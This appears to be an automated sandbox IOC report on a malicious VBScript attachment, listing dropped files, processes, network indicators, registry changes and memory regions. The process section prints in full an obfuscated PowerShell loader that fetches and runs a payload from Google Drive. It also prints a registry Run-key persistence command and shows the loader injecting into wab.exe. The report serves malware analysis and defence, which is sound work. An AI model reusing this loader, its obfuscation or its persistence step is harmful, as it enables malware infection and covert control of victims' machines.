IOC Report
TRANSPORT_INSTRUCTION_MR.vbs

loading gif

Files

File Path
Type
Category
Malicious
TRANSPORT_INSTRUCTION_MR.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32evix11.5qn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3v31mlpq.rdr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuoyq1zo.i03.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pejvmc3m.thk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Prehatred.Fid
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSPORT_INSTRUCTION_MR.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l YletimockinBoge,eBe.ne] Band=Kam a$ UncoGStul,rTendieIdeykeSyrefnInd ahTeknoeLukkeaReregrHa.dwtTil e ');$Cleanliness=Shockhead 'E strMNoiseePlantsDi.kmsFre.saStolpnOverpsH lvb.Skad DArb,joWaii,wGlucinFirdol,arsnoavoweaForlfdSacriF LipoiTherelKashreOverc(Reinq$Bred.oNoncosDiffetAtomml orue erfrSubj,,Brand$,ontrAUdadldEnspnvColumeF.rier IntetSto.eiSnow,s OveresortemhulheeFluatn ForbtDegl,) Letf ';$Cleanliness=$Aandelydens[1]+$Cleanliness;$Advertisement=$Aandelydens[0];sabotage (Shockhead 'ba ka$KonsogMallol,eeamoLng rbSt.dfa Extrl Oper:Mou tS Enc,tUninwoDyskimLbrikaNoveltS ppeoBemedlVejfoaDyrknlSikkeiAnv,la Cami=C arm( st pTValu.eLdst.sMandot re,l-Al.egP Cafaa KnaptMismohUneva assai$ St.lA BobsdTonsuvSu.ere.ruitrflerbtGrammi ReexsBantaeKreatmHonoreSubconYn,eftNosta)Solis ');while (!$Stomatolalia) {sabotage (Shockhead 'M,ner$aj.urgTilstlTr eroNedkabchemiaunm,rlRecto:Maar,BPol.teUnscokImpotlHeltiiWestfpFranc=Infor$UdskytForvar GypsuBjer.eK ini ') ;sabotage $Cleanliness;sabotage (Shockhead 'EnegnSO,erbtTilh,a UngerHjemmtAutoc-SikkeSGrundlBeboeeBiog.eTerrapBrati Kolpo4Hawai ');sabotage (Shockhead 'Forva$Afvasg sturl UnseoMuni.bArlasaBalallj.mre:CalviS Be ttHy.peoAnti.mVidera CalltLandgo,antal Toasa Li.glWatchiCunctaEx,re=Aflgg( SamvT Ov reHvilesPartntSleet-SildePJohnsaLsthnt Sarchsteti Farv$PhysiAAbekad aardv AfteeH.venr EkmatCatariRosels,ttene E.ytmBoligeBoomenBiltytOlied),veri ') ;sabotage (Shockhead 'Fo,pe$TekstgpratflExotioKandebAceraaIsledlQuais:Emo.lCIrrefoPrecafFor.kfRrblaeordinyAnth =ingur$Dyre,g ,inulLi,teoDispeb K,lma PostlTitle:HofdaOPodopv Lim.eHum ir BayehNybago.akkenWebsaoFradruKosmor EtmasUdvan+ n,pp+Capit%jutta$MakulU Ov rnPullisSam.ehHv eluS.nksnPlattnTrakte MudkdFeist. Iv ncAbortoOpkaluCoop.nOrdgytBanko ') ;$ostler=$Unshunned[$Coffey];}sabotage (Shockhead 'Foelg$ H,stgO.twilBumblo AktibSardiaB vrtlstrig:elusiHSkattiBuncen Undek ,aadeBe tysGravm1Beho 7Foeta1Ha wa Disp=Unill Saa,bG ,alle Sjl.tDelim-KloniCAeroto SpronAmorttMatloeProrinRegertNvnel Annbe$CainoADigitdPr hiv Il.ee,eboer Scabtremaii.usyisTilvreVariamMiddae,eeksnParont Seme ');sabotage (Shockhead 'consp$ Ser,gHe,orlWron,oReplibFleksaLev.fl Tent: L.goOCheekpTr.tehc.leuiBetr d Unifsopsk e IndilTrills UklaeGenopnPrlu sDisas Fdsel=Nable Fjeli[Cere SF,rpuy.attesAnnuat Bu geMirakm Fora.VidebCOctaeoSemihnEx,riv NosteVeterrLagentLo,ts] Lgel: Irid:RepavF KalvrLophoo Mon.mIbskaB I poaKlagesU suleTekn 6 ar e4skattSCo,metSldehrPlanfi TriknWingegal yl(Tnkba$ Ge,sHUnpoliFortrnTilfrkTitoieM.sors uss1Pente7B.and1Liter)Fors ');sabotage (Shockhead 'A,ure$QuadrgHe milCrysto UndebGrid,a RkenlSvar,:,ndelS tereaSk,tkuTaster SteriFawe ePsyk.sBalla T,igg=Enspr Q,atr[Nj.gtSBrne yTotemsWiljatRombleVek emFa.rd.JaspiT Fu,deSuffex,verdt M.te.HydroE CsiunBarnecanvenoIn uidTr nsiReg.on QuargKonse]Frike:Infel:.warfApatroSLe.trCAlimeIMaeglIFe ch.NeuraGReposecoun,t FligSAlchetPleber Pag.izairen Spi,g R,nt(Festr$RemoiO Karbp TakthLe.ali ocktdt,kkes Prusedksmal ndes L,mieUndecnekspos Skib)Ekspe ');sabotage (Shockhead 'Innov$An lag AblulYaqonoEquilbAm.slaPhotolArthr: TrygNHjemmoBlaatn Sce cPleaclSprezaErklrrSyreriHestefStandiUnhoscSergeaInan t S.ediKonjuoHaandn Spl =unpro$CrackSRdklka,rithuC,nalrAbsoliGtesee SchesKawc,.Pumpesharddu B sibP ncrsSi,tetChilarKamali.lygtnDirekg Sve.( retn2irreg9Coldc0.enua6sankt9M,jem7Forma, bes.2 Coll9Kopul4Detri5 Ner 0Trium)Opsl, ');sabotage $Nonclarification;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l YletimockinBoge,eBe.ne] Band=Kam a$ UncoGStul,rTendieIdeykeSyrefnInd ahTeknoeLukkeaReregrHa.dwtTil e ');$Cleanliness=Shockhead 'E strMNoiseePlantsDi.kmsFre.saStolpnOverpsH lvb.Skad DArb,joWaii,wGlucinFirdol,arsnoavoweaForlfdSacriF LipoiTherelKashreOverc(Reinq$Bred.oNoncosDiffetAtomml orue erfrSubj,,Brand$,ontrAUdadldEnspnvColumeF.rier IntetSto.eiSnow,s OveresortemhulheeFluatn ForbtDegl,) Letf ';$Cleanliness=$Aandelydens[1]+$Cleanliness;$Advertisement=$Aandelydens[0];sabotage (Shockhead 'ba ka$KonsogMallol,eeamoLng rbSt.dfa Extrl Oper:Mou tS Enc,tUninwoDyskimLbrikaNoveltS ppeoBemedlVejfoaDyrknlSikkeiAnv,la Cami=C arm( st pTValu.eLdst.sMandot re,l-Al.egP Cafaa KnaptMismohUneva assai$ St.lA BobsdTonsuvSu.ere.ruitrflerbtGrammi ReexsBantaeKreatmHonoreSubconYn,eftNosta)Solis ');while (!$Stomatolalia) {sabotage (Shockhead 'M,ner$aj.urgTilstlTr eroNedkabchemiaunm,rlRecto:Maar,BPol.teUnscokImpotlHeltiiWestfpFranc=Infor$UdskytForvar GypsuBjer.eK ini ') ;sabotage $Cleanliness;sabotage (Shockhead 'EnegnSO,erbtTilh,a UngerHjemmtAutoc-SikkeSGrundlBeboeeBiog.eTerrapBrati Kolpo4Hawai ');sabotage (Shockhead 'Forva$Afvasg sturl UnseoMuni.bArlasaBalallj.mre:CalviS Be ttHy.peoAnti.mVidera CalltLandgo,antal Toasa Li.glWatchiCunctaEx,re=Aflgg( SamvT Ov reHvilesPartntSleet-SildePJohnsaLsthnt Sarchsteti Farv$PhysiAAbekad aardv AfteeH.venr EkmatCatariRosels,ttene E.ytmBoligeBoomenBiltytOlied),veri ') ;sabotage (Shockhead 'Fo,pe$TekstgpratflExotioKandebAceraaIsledlQuais:Emo.lCIrrefoPrecafFor.kfRrblaeordinyAnth =ingur$Dyre,g ,inulLi,teoDispeb K,lma PostlTitle:HofdaOPodopv Lim.eHum ir BayehNybago.akkenWebsaoFradruKosmor EtmasUdvan+ n,pp+Capit%jutta$MakulU Ov rnPullisSam.ehHv eluS.nksnPlattnTrakte MudkdFeist. Iv ncAbortoOpkaluCoop.nOrdgytBanko ') ;$ostler=$Unshunned[$Coffey];}sabotage (Shockhead 'Foelg$ H,stgO.twilBumblo AktibSardiaB vrtlstrig:elusiHSkattiBuncen Undek ,aadeBe tysGravm1Beho 7Foeta1Ha wa Disp=Unill Saa,bG ,alle Sjl.tDelim-KloniCAeroto SpronAmorttMatloeProrinRegertNvnel Annbe$CainoADigitdPr hiv Il.ee,eboer Scabtremaii.usyisTilvreVariamMiddae,eeksnParont Seme ');sabotage (Shockhead 'consp$ Ser,gHe,orlWron,oReplibFleksaLev.fl Tent: L.goOCheekpTr.tehc.leuiBetr d Unifsopsk e IndilTrills UklaeGenopnPrlu sDisas Fdsel=Nable Fjeli[Cere SF,rpuy.attesAnnuat Bu geMirakm Fora.VidebCOctaeoSemihnEx,riv NosteVeterrLagentLo,ts] Lgel: Irid:RepavF KalvrLophoo Mon.mIbskaB I poaKlagesU suleTekn 6 ar e4skattSCo,metSldehrPlanfi TriknWingegal yl(Tnkba$ Ge,sHUnpoliFortrnTilfrkTitoieM.sors uss1Pente7B.and1Liter)Fors ');sabotage (Shockhead 'A,ure$QuadrgHe milCrysto UndebGrid,a RkenlSvar,:,ndelS tereaSk,tkuTaster SteriFawe ePsyk.sBalla T,igg=Enspr Q,atr[Nj.gtSBrne yTotemsWiljatRombleVek emFa.rd.JaspiT Fu,deSuffex,verdt M.te.HydroE CsiunBarnecanvenoIn uidTr nsiReg.on QuargKonse]Frike:Infel:.warfApatroSLe.trCAlimeIMaeglIFe ch.NeuraGReposecoun,t FligSAlchetPleber Pag.izairen Spi,g R,nt(Festr$RemoiO Karbp TakthLe.ali ocktdt,kkes Prusedksmal ndes L,mieUndecnekspos Skib)Ekspe ');sabotage (Shockhead 'Innov$An lag AblulYaqonoEquilbAm.slaPhotolArthr: TrygNHjemmoBlaatn Sce cPleaclSprezaErklrrSyreriHestefStandiUnhoscSergeaInan t S.ediKonjuoHaandn Spl =unpro$CrackSRdklka,rithuC,nalrAbsoliGtesee SchesKawc,.Pumpesharddu B sibP ncrsSi,tetChilarKamali.lygtnDirekg Sve.( retn2irreg9Coldc0.enua6sankt9M,jem7Forma, bes.2 Coll9Kopul4Detri5 Ner 0Trium)Opsl, ');sabotage $Nonclarification;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andelsbevaegelsen" /t REG_EXPAND_SZ /d "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\Dirigent\').skemaformernes;%Before110% ($Tohndig)"
malicious
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andelsbevaegelsen" /t REG_EXPAND_SZ /d "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\Dirigent\').skemaformernes;%Before110% ($Tohndig)"
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://api.ipify.org/
104.26.13.205
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.googP
unknown
https://drive.google.com
unknown
https://drive.usercontent.googh
unknown
https://drive.usercontent.google.com
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.v
unknown
https://github.com/Pester/Pester
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 12 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.210.172
drive.google.com
142.251.32.110
drive.usercontent.google.com
142.251.35.161
api.ipify.org
104.26.13.205
ip-api.com
208.95.112.1
mail.myhydropowered.com
unknown

IPs

IP
Domain
Country
Malicious
142.251.35.161
drive.usercontent.google.com
United States
208.95.112.1
ip-api.com
United States
142.251.32.110
drive.google.com
United States
104.26.13.205
api.ipify.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Dirigent
skemaformernes
HKEY_CURRENT_USER\Environment
Before110
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Andelsbevaegelsen
There are 22 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
253F5000
trusted library allocation
page read and write
malicious
59B4000
trusted library allocation
page read and write
malicious
7365000
remote allocation
page execute and read and write
malicious
C025000
direct allocation
page execute and read and write
malicious
2541D000
trusted library allocation
page read and write
malicious
85F0000
direct allocation
page execute and read and write
malicious
26D56CF2000
trusted library allocation
page read and write
malicious
1D9961A0000
heap
page read and write
1D9962ED000
heap
page read and write
27AE0000
trusted library allocation
page read and write
263F6000
trusted library allocation
page read and write
B68000
heap
page read and write
281C0000
trusted library allocation
page read and write
A56000
trusted library allocation
page execute and read and write
1D99630E000
heap
page read and write
1D9962ED000
heap
page read and write
2C8E000
stack
page read and write
1D996153000
heap
page read and write
2D05000
trusted library allocation
page execute and read and write
7FF848EC0000
trusted library allocation
page read and write
1D9962ED000
heap
page read and write
281A2000
trusted library allocation
page read and write
1D9962BA000
heap
page read and write
274DE000
heap
page read and write
1D994120000
heap
page read and write
26D474AB000
trusted library allocation
page read and write
45CC000
stack
page read and write
8640000
direct allocation
page read and write
A225000
direct allocation
page execute and read and write
1D996137000
heap
page read and write
1D9961A3000
heap
page read and write
1D9961AB000
heap
page read and write
27AE0000
trusted library allocation
page read and write
27AE0000
trusted library allocation
page read and write
1D9962FB000
heap
page read and write
281B0000
trusted library allocation
page read and write
F5723B3000
stack
page read and write
7FF849020000
trusted library allocation
page read and write
27AE0000
trusted library allocation
page read and write
1D996137000
heap
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
73CE000
stack
page read and write
1D995CB0000
heap
page read and write
1D9960F1000
heap
page read and write
7540000
trusted library allocation
page read and write
1D9962ED000
heap
page read and write
71F9000
heap
page read and write
26D48ABD000
trusted library allocation
page read and write
1D9961E3000
heap
page read and write
30FD000
stack
page read and write
1D9968F5000
heap
page read and write
1D9962DA000
heap
page read and write
1D9962DA000
heap
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
74C0000
trusted library allocation
page read and write
252D8000
trusted library allocation
page read and write
27AED000
trusted library allocation
page read and write
28200000
trusted library allocation
page read and write
1D9968FD000
heap
page read and write
1D9962ED000
heap
page read and write
281B0000
trusted library allocation
page read and write
26D5F2F7000
heap
page read and write
B57000
heap
page read and write
315E000
stack
page read and write
3402000
heap
page read and write
1D9968F0000
heap
page read and write
26D48A23000
trusted library allocation
page read and write
72B8000
heap
page read and write
281B0000
trusted library allocation
page read and write
281F0000
trusted library allocation
page read and write
A50000
trusted library allocation
page read and write
282A0000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
1D996136000
heap
page read and write
26D470F1000
trusted library allocation
page read and write
1D9962C5000
heap
page read and write
707E000
stack
page read and write
1D994425000
heap
page read and write
250A0000
heap
page read and write
281A0000
trusted library allocation
page read and write
1D9962DA000
heap
page read and write
281B0000
trusted library allocation
page read and write
1D9961EE000
heap
page read and write
1D996132000
heap
page read and write
330E000
stack
page read and write
27520000
trusted library allocation
page read and write
D30000
direct allocation
page read and write
1D996177000
heap
page read and write
1D9962BA000
heap
page read and write
281B0000
trusted library allocation
page read and write
26D48A3E000
trusted library allocation
page read and write
281B0000
trusted library allocation
page read and write
281F0000
trusted library allocation
page read and write
B71000
heap
page read and write
1D9961EE000
heap
page read and write
281A0000
trusted library allocation
page read and write
1D9943E0000
remote allocation
page read and write
26D45007000
heap
page read and write
2B40000
trusted library section
page read and write
1D9962ED000
heap
page read and write
26D474E8000
trusted library allocation
page read and write
26D5F2C0000
heap
page read and write
281B0000
trusted library allocation
page read and write
2D02000
trusted library allocation
page read and write
1D996900000
heap
page read and write
A33000
trusted library allocation
page execute and read and write
6A7E000
stack
page read and write
28200000
trusted library allocation
page read and write
28200000
trusted library allocation
page read and write
9880000
direct allocation
page read and write
1D996418000
heap
page read and write
1D9961EE000
heap
page read and write
723D000
heap
page read and write
281C0000
trusted library allocation
page read and write
26D489B9000
trusted library allocation
page read and write
281A7000
trusted library allocation
page read and write
1D996119000
heap
page read and write
1D996137000
heap
page read and write
7510000
trusted library allocation
page read and write
7FB0000
heap
page read and write
6D8E000
stack
page read and write
85BE000
stack
page read and write
1D996293000
heap
page read and write
1D9960F3000
heap
page read and write
6C90000
direct allocation
page read and write
1D996915000
heap
page read and write
2744E000
heap
page read and write
281B1000
trusted library allocation
page read and write
1D9962FB000
heap
page read and write
26D45031000
heap
page read and write
27AE0000
trusted library allocation
page read and write
2CE9000
trusted library allocation
page read and write
26D47175000
trusted library allocation
page read and write
1D9961E0000
heap
page read and write
1D996256000
heap
page read and write
28210000
trusted library allocation
page execute and read and write
281B0000
trusted library allocation
page read and write
26D47335000
trusted library allocation
page read and write
26D44FF7000
heap
page read and write
1D9960FA000
heap
page read and write
1D9962C5000
heap
page read and write
1D996245000
heap
page read and write
